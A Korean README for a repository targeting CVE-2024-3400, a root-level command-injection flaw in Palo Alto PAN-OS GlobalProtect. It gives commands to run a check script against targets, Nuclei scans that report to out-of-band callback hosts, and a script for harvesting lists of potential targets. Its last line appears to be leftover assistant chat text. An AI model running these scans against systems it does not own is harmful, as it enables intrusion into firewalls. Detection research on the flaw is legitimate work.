


특정 PAN-OS 버전 및 특정 기능 구성에서 Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 기능 내 임의 파일 생성 취약점으로 인한 명령 주입은 인증되지 않은 공격자가 방화벽에서 루트 권한으로 임의 코드를 실행할 수 있게 할 수 있습니다.
Cloud NGFW, Panorama 어플라이언스 및 Prisma Access는 이 취약점의 영향을 받지 않습니다.
이 저장소에는 Palo Alto PAN-OS 버그와 관련된 취약점, 특히 CVE-2024-3400을 대상으로 탐지하도록 설계된 Nuclei 템플릿이 포함되어 있습니다.
다음에서 포괄적인 연구가 수행되었습니다.
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Bash 스크립트를 실행하려면 다음 명령을 실행하십시오:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
이 스크립트는 파일이 생성되었는지 확인합니다(200 OK 상태 반환). 성공하면 파일이 존재하는지 검증합니다(403 Forbidden 상태 반환).
interactsh-client -v
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
잠재적 대상 목록은 여기에서 찾을 수 있습니다.
python fofax3r.py
이 README.md는 취약점에 대한 정보, 제공된 스크립트 사용 방법, 잠재적 대상 및 작성자 크레딧을 제공합니다. 추가 조정이 필요하면 알려주세요!